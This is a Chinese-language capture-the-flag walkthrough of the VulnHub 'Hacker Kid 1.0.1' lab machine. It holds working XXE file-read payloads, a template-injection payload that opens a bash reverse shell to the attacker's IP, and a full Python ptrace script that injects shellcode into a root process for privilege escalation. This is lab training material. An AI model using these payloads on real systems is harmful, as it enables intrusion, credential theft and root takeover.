HACKER KID: 1.0.1實戰(zhàn)演練

一、前期準備

1、相關(guān)信息

靶機網(wǎng)站：https://www.vulnhub.com/entry/hacker-kid-101,719/

設備名稱	IP地址
攻擊機：kali	192.168.0.109
靶機：Hacker kid: 1.0.1	192.168.0.103

二、信息收集

1、端口掃描

┌──(kali?kali)-[~]
└─$ nmap -A 192.168.0.103

//開放DNS:53端口、WEB:80端口、9999端口
//DNS:53端口版本號ISC BIND 9.16.1
//WEB:80端口中間件為Apache-httpd 2.4.41
//MySQL:3306端口版本號為Tornado httpd 6.1

2、訪問網(wǎng)站

http://192.168.0.103/

翻譯為：
你給我起了一個“臭名昭著的黑客”的名字！！就因為我黑了你的整個服務器。
現(xiàn)在我可以訪問你的整個服務器了。如果你足夠聰明，可以取回它，就給我看看。
“你越挖我，你就會在你的服務器上找到我。挖我…挖我更多”

http://192.168.0.103/index.html

//無法訪問，返回404

http://192.168.0.103/#app.html

//發(fā)現(xiàn)出現(xiàn)一個#符號，頁面沒有變化

http://192.168.0.103/app.html

//功能沒法使用

http://192.168.0.103/#form.html

//發(fā)現(xiàn)出現(xiàn)一個#符號，頁面沒有變化

http://192.168.0.103/form.html

3、掃描目錄

┌──(kali?kali)-[~]
└─$ sudo dirsearch -u http://192.168.0.103   

4、查看源碼

view-source:http://192.168.0.103/index.php

//使用GET提交page_no請求新的頁面

5、請求參數(shù)

http://192.168.0.103/index.php?page_no=1

//有回顯，批量測試

6、burpsuite批量請求

//原文為：
Okay so you want me to speak something ?
I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!
Out of my many homes...one such home..one such home for me : hackers.blackhat.local
//翻譯為：
好吧，你想讓我說點什么？
我是一個黑客孩子，而不是一個愚蠢的黑客。所以我創(chuàng)建了一些子域，以便隨時返回服務器！！
在我的許多家里。。。一個這樣的家。。對我來說就是這樣一個家：hackers.blackhat.local

7、編輯hosts文件

┌──(kali?kali)-[~]
└─$ sudo vim /etc/hosts 

//添加192.168.0.103   hackers.blackhat.local

8、DNS區(qū)域傳輸

┌──(kali?kali)-[~]
└─$ dig axfr @192.168.0.103 blackhat.local

9、編輯hosts

┌──(kali?kali)-[~]
└─$ sudo vim /etc/hosts  

10、訪問網(wǎng)站

http://hackerkid.blackhat.local/

//發(fā)現(xiàn)一個注冊界面

11、注冊賬號

//提示郵箱錯誤

12、burpsuite抓包

//發(fā)現(xiàn)是XML傳輸數(shù)據(jù)的

13、XML注入

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
<root><name>kali</name><tel>13911111111</tel><email>&xxe;</email><password>123456</password>
</root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY  xxe  SYSTEM   "php://filter/convert.base64-encode/resource=/home/saket/.bashrc"  >]>   
<root><name>kali</name><tel>13911111111</tel><email>&xxe;</email><password>123456</password>
</root>

14、解密

//賬號：admin
//密碼：Saket!#$%@!!

15、登錄網(wǎng)站的9999端口

http://192.168.0.103:9999/login?next=%2F

//賬號：saket，密碼：Saket!#$%@!!
//原文為：
Tell me your name buddy
How can i get to know who are you ??
//翻譯為：
告訴我你的名字，伙計
我怎么才能知道你是誰？？ 

16、提交參數(shù)

//編碼前：
{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.0.109/4444 0>&1"')}}
//編碼后：
%7B%25%20import%20os%20%25%7D%7B%7Bos.system('bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.109%2F4444%200%3E%261%22')%7D%7D

17、監(jiān)聽

┌──(kali?kali)-[~]
└─$ nc -nvlp 4444      

三、提權(quán)

1、查找具有Capabilities特殊操作權(quán)限的程序

saket@ubuntu:~$ /usr/sbin/getcap -r / 2>/dev/null 

2、創(chuàng)建源碼文件

# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.
# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c import ctypes
import sys
import struct# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.htmlPTRACE_POKETEXT   = 4
PTRACE_GETREGS    = 12
PTRACE_SETREGS    = 13
PTRACE_ATTACH     = 16
PTRACE_DETACH     = 17# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_structclass user_regs_struct(ctypes.Structure):_fields_ = [("r15", ctypes.c_ulonglong),("r14", ctypes.c_ulonglong),("r13", ctypes.c_ulonglong),("r12", ctypes.c_ulonglong),("rbp", ctypes.c_ulonglong),("rbx", ctypes.c_ulonglong),("r11", ctypes.c_ulonglong),("r10", ctypes.c_ulonglong),("r9", ctypes.c_ulonglong),("r8", ctypes.c_ulonglong),("rax", ctypes.c_ulonglong),("rcx", ctypes.c_ulonglong),("rdx", ctypes.c_ulonglong),("rsi", ctypes.c_ulonglong),("rdi", ctypes.c_ulonglong),("orig_rax", ctypes.c_ulonglong),("rip", ctypes.c_ulonglong),("cs", ctypes.c_ulonglong),("eflags", ctypes.c_ulonglong),("rsp", ctypes.c_ulonglong),("ss", ctypes.c_ulonglong),("fs_base", ctypes.c_ulonglong),("gs_base", ctypes.c_ulonglong),("ds", ctypes.c_ulonglong),("es", ctypes.c_ulonglong),("fs", ctypes.c_ulonglong),("gs", ctypes.c_ulonglong),]libc = ctypes.CDLL("libc.so.6")pid=int(sys.argv[1])# Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))print("Instruction Pointer: " + hex(registers.rip))print("Injecting Shellcode at: " + hex(registers.rip))# Shell code copied from exploit db.
shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"# Inject the shellcode into the running process byte by byte.
for i in xrange(0,len(shellcode),4):# Convert the byte to little endian.shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')shellcode_byte=int(shellcode_byte_little_endian,16)# Inject the byte.libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)print("Shellcode Injected!!")# Modify the instuction pointer
registers.rip=registers.rip+2# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))print("Final Instruction Pointer: " + hex(registers.rip))# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)

3、開機本地開啟http服務

┌──(kali?kali)-[~]
└─$ python -m http.server 8080

4、下載腳本

saket@ubuntu:~$ wget http://192.168.0.109:8080/inject.py

5、查看以root運行的進程

saket@ubuntu:~$ ps -aef | grep root

6、執(zhí)行腳本

saket@ubuntu:~$ python2.7 inject.py 670

7、查看端口是否開放

saket@ubuntu:~$ netstat -ano | grep 5600

//如果端口沒打開，可以重新選擇進程號

8、連接端口

┌──(kali?kali)-[~]
└─$ nc 192.168.0.103 5600